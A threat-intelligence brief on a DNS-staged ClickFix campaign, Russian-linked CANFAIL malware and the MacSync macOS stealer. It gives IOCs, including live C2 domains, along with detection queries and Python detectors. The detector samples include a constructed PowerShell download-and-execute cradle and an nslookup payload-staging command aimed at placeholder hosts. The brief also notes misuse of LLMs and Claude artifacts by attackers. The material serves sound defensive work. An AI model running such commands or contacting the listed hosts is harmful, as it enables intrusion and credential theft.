Threat Brief — Saturday, February 15, 2026
Executive Summary
Microsoft disclosed a new ClickFix variant using nslookup for DNS-based payload staging—it delivers ModeloRAT and Lumma Stealer while evading web request monitoring. Russian-linked CANFAIL malware is targeting Ukrainian defense with LLM-assisted reconnaissance. macOS users are being hit by the MacSync stealer, distributed through Google Ads and Claude artifacts.
1. DNS-Based ClickFix Attack (ModeloRAT/Lumma Stealer)
🔴 Critical · Social Engineering + Malware Delivery · No CVE · Active Campaigns
Microsoft disclosed a new ClickFix variant that uses nslookup against external DNS servers to retrieve payloads from TXT records. It bypasses web request monitoring by blending into DNS traffic, and delivers ModeloRAT (a Python RAT) and Lumma Stealer via CastleLoader.
Sources: The Hacker News · Microsoft
TTPs
| Technique | Tactic | Observable |
|---|---|---|
| T1204.002 | Execution | User runs command via Windows Run dialog |
| T1059.001 | Execution | cmd.exe → nslookup with hardcoded external DNS server |
| T1071.004 | C2 | DNS queries to attacker-controlled nameservers |
| T1059.006 | Execution | Python-based ModeloRAT execution |
| T1547.001 | Persistence | LNK file in Windows Startup folder |
IOCs
- azwsappdev[.]com — Payload hosting (ZIP archive)
- Hardcoded external DNS servers (not the system resolver)
- VBScript launching ModeloRAT
Detection
Log Sources: Sysmon (ProcessCreate, NetworkConnect), DNS logs, PowerShell logs
Logic:
# Nslookup with a hardcoded server that is not a common public resolver
index=sysmon EventCode=1 Image="*nslookup.exe"
| regex CommandLine="nslookup.*\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}"
| where NOT match(CommandLine, "(8\.8\.8\.8|8\.8\.4\.4|1\.1\.1\.1)")
# CMD spawning nslookup then PowerShell (both children carry cmd.exe's PID as ParentProcessId)
index=sysmon EventCode=1 ParentImage="*cmd.exe" (Image="*nslookup.exe" OR Image="*powershell.exe")
| transaction ParentProcessId maxspan=30s
| search Image="*nslookup.exe" Image="*powershell.exe"
Existing Coverage:
- Nslookup PowerShell Download Cradle (Sigma) ✅
- Nslookup PowerShell Download Cradle - ProcessCreation (Sigma) ✅
- DNS Exfiltration Using Nslookup App (Splunk ESCU) ✅
- Cisco Secure Firewall - Lumma Stealer Activity (Splunk ESCU) ✅
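The two detections above, applied to constructed Sysmon EventCode 1 records (an added example, not code from the brief or from Microsoft's report). The chain rule resolves the parent link explicitly: a cmd.exe whose own children include nslookup.exe and powershell.exe within 30 s. The resolver allowlist, IPs and domains are placeholders chosen for the example.

```python
import re
from datetime import datetime, timedelta

# Constructed allowlist of resolvers treated as benign; extend for your environment.
KNOWN_RESOLVERS = {"8.8.8.8", "8.8.4.4", "1.1.1.1"}
IPV4 = re.compile(r"(?<!\d)(?:\d{1,3}\.){3}\d{1,3}(?!\d)")

def basename(image):
    return image.rsplit("\\", 1)[-1].lower()

def nslookup_external_dns(event):
    """Rule 1: nslookup.exe given a hardcoded server outside the allowlist.
    Returns the suspect IPs, or None when the rule does not fire."""
    if basename(event["Image"]) != "nslookup.exe":
        return None
    suspects = sorted(set(IPV4.findall(event["CommandLine"])) - KNOWN_RESOLVERS)
    return suspects or None

def cmd_nslookup_powershell_chains(events, maxspan=timedelta(seconds=30)):
    """Rule 2: cmd.exe whose own children include nslookup.exe and powershell.exe
    started within maxspan of each other. Returns the matching cmd.exe ProcessIds."""
    children = {}
    for e in events:
        children.setdefault(e["ParentProcessId"], []).append(e)
    wanted, hits = {"nslookup.exe", "powershell.exe"}, []
    for e in events:
        if basename(e["Image"]) != "cmd.exe":
            continue
        kids = sorted(children.get(e["ProcessId"], []), key=lambda k: k["UtcTime"])
        seen = [k for k in kids if basename(k["Image"]) in wanted]
        if ({basename(k["Image"]) for k in seen} == wanted
                and seen[-1]["UtcTime"] - seen[0]["UtcTime"] <= maxspan):
            hits.append(e["ProcessId"])
    return hits

# Constructed Sysmon-style EventCode 1 records; IP and domains are documentation placeholders.
T0, SYS32 = datetime(2026, 2, 15, 12, 0, 0), r"C:\Windows\System32"
def ev(offset_s, pid, ppid, image, cmdline):
    return {"UtcTime": T0 + timedelta(seconds=offset_s), "ProcessId": pid,
            "ParentProcessId": ppid, "Image": image, "CommandLine": cmdline}
EVENTS = [
    ev(0, 4000, 1200, SYS32 + r"\cmd.exe", "cmd /c <pasted Run-dialog command>"),
    ev(1, 4001, 4000, SYS32 + r"\nslookup.exe",
       "nslookup -type=txt stage.example.invalid 203.0.113.53"),
    ev(4, 4002, 4000, SYS32 + r"\WindowsPowerShell\v1.0\powershell.exe",
       "powershell -nop -w hidden -e <encoded command>"),
    ev(300, 5000, 1200, SYS32 + r"\nslookup.exe", "nslookup intranet.corp.example 8.8.8.8"),
]
```

Running both rules over EVENTS flags the nslookup call to 203.0.113.53 and the cmd.exe with PID 4000, while the later lookup against 8.8.8.8 stays silent.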
Action
🔴 Hunt for nslookup with external DNS. Microsoft detects as Trojan:Win32/ClickFix.R!ml. Look for LNK files in Startup folders pointing to VBScript.
2. CANFAIL Malware Targeting Ukraine
🟡 High · Espionage · No CVE · Russian-Linked APT
Google GTIG attributes CANFAIL malware to suspected Russian intelligence. It targets Ukrainian defense, energy and government organizations. The actor uses LLMs for reconnaissance and lure generation; phishing impersonates Ukrainian energy orgs.
Sources: The Hacker News · Google Cloud Blog
TTPs
| Technique | Tactic | Observable |
|---|---|---|
| T1566.002 | Initial Access | Google Drive links in phishing emails |
| T1059.007 | Execution | Obfuscated JavaScript (.pdf.js) |
| T1059.001 | Execution | PowerShell dropper → memory-only execution |
| T1204.001 | Execution | User executes RAR archive content |
| T1102 | C2 | WebSocket-based trojan communication |
IOCs
- RAR archives via Google Drive links
- JavaScript files with double extension (*.pdf.js)
- Fake Ukrainian energy company domains
- LLM-generated phishing lures
Detection
Log Sources: Email gateway, Sysmon, PowerShell logs
Logic:
# RAR extraction followed by JS execution
index=sysmon EventCode=1
| transaction ParentProcessId maxspan=60s
| search (Image="*WinRAR*" OR Image="*7z*") Image="*wscript*"
# Memory-only PowerShell (encoded or Base64-decoded command, no -File parameter)
index=sysmon EventCode=1 Image="*powershell.exe"
| where NOT match(CommandLine, "(?i)(^| )-file( |$)")
| where match(CommandLine, "(?i)(^| )-e(?![xp])[a-z]* |FromBase64")
Existing Coverage:
- Suspicious PowerShell Download (Sigma) ✅
- Obfuscated PowerShell OneLiner Execution (Sigma) ✅
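The memory-only PowerShell check above, worked through in Python as an added example (not code from the brief or from GTIG's report): it matches every abbreviation powershell.exe accepts for -EncodedCommand without tripping on -ExecutionPolicy, decodes the UTF-16LE Base64 payload, and looks for download-and-run-in-memory markers. The marker list and the sample command lines are constructed for the example.

```python
import base64
import re

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...),
# so match -e followed by anything except 'x' (which would be -ExecutionPolicy/-exec).
ENC_FLAG = re.compile(r"(?:^|\s)-e(?!x)\w*\s+([A-Za-z0-9+/=]{16,})", re.I)
# -f, -fi, -fil, -file all select -File: the script lives on disk, not only in memory.
FILE_FLAG = re.compile(r"(?:^|\s)-f(?:i(?:le?)?)?\s", re.I)
# Constructed list of markers for download-and-run-in-memory behaviour.
MEMORY_MARKERS = ("Invoke-Expression", "IEX", "DownloadString", "FromBase64String",
                  "Reflection.Assembly", "Invoke-WebRequest")

def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload (UTF-16LE Base64), or None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def classify(cmdline):
    """Return (suspicious, reason) for one powershell.exe command line."""
    if FILE_FLAG.search(cmdline):
        return False, "script file on disk (-File)"
    decoded = decode_encoded_command(cmdline)
    if decoded is None:
        if "frombase64" in cmdline.lower():
            return True, "inline FromBase64 without -File"
        return False, "no encoded command"
    hits = [mk for mk in MEMORY_MARKERS if mk.lower() in decoded.lower()]
    if hits:
        return True, "encoded command contains " + ", ".join(hits)
    return True, "encoded command without -File"

# Constructed samples: a memory-only download cradle of the kind the chain above relies on,
# next to two benign invocations that the broad "-e" substring check would misfire on.
SAMPLE_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://stage.example.invalid/p')"
SAMPLE_ENCODED = base64.b64encode(SAMPLE_PAYLOAD.encode("utf-16-le")).decode()
SAMPLES = [
    "powershell.exe -nop -w hidden -enc " + SAMPLE_ENCODED,
    "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\backup.ps1",
    "powershell.exe -ep bypass -c Get-Process",
]
```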
Action
🟡 Hunt if in-scope. Relevant for orgs supporting Ukraine or in defense/energy sectors. Look for Google Drive links in phishing leading to RAR→JS→PowerShell chains.
3. macOS MacSync Stealer via Claude/Google Ads
🟡 High · Info Stealer · No CVE · ClickFix Social Engineering
Campaign abuses Google Ads and Anthropic Claude artifacts to deliver the MacSync stealer; 15,000+ users exposed. It uses the ClickFix technique to trick users into running Terminal commands, and targets the keychain, browser data and crypto wallets.
Sources: CyberPress · Moonlock Lab
TTPs
| Technique | Tactic | Observable |
|---|---|---|
| T1583.008 | Resource Dev | Malvertising via Google Ads |
| T1204.002 | Execution | User pastes Base64 command into Terminal |
| T1059.002 | Execution | osascript piped command execution |
| T1555 | Cred Access | Keychain credential theft |
| T1041 | Exfiltration | HTTP POST with chunked uploads |
IOCs
- a2abotnet[.]com/dynamic — C2 server
- a2abotnet[.]com/gate — Data exfil endpoint
- raxelpak[.]com — Payload hosting
- apple-mac-disk-space.medium[.]com — Fake Apple article
- /tmp/osalogging.zip — Staging file
Detection
Log Sources: macOS Unified Logs, EDR, network traffic
Logic:
# Curl piped to osascript (a pipeline makes both children of the shell, so inspect the shell's command line)
process where process.name == "osascript" and process.parent.name in ("sh", "bash", "zsh")
  and process.parent.command_line : "*curl*|*osascript*"
# Base64 decode in Terminal context (macOS base64 also accepts -D / --decode)
process where process.name == "base64" and process.args : ("-d", "-D", "--decode")
  and process.parent.name in ("Terminal", "bash", "zsh")
# Network to known C2
dns.question.name : ("a2abotnet.com", "raxelpak.com")
Existing Coverage:
- JXA In-memory Execution Via OSAScript (Sigma) ✅
- Clipboard Data Collection Via OSAScript (Sigma) ✅
- MacOS AMOS Stealer - VM Check Activity (Splunk ESCU) ✅
Action
🟡 Block IOCs at perimeter. Add a2abotnet[.]com and raxelpak[.]com to blocklists. Educate users about fake “DNS resolver” or “disk analyzer” prompts.
Priority Actions
- 🔴 ClickFix DNS staging — Hunt for nslookup to external DNS servers followed by PowerShell
- 🟡 macOS MacSync — Block a2abotnet[.]com and raxelpak[.]com; educate users on Terminal paste attacks
- 🟡 Ukraine-supporting orgs — Hunt for CANFAIL indicators if in defense/energy sectors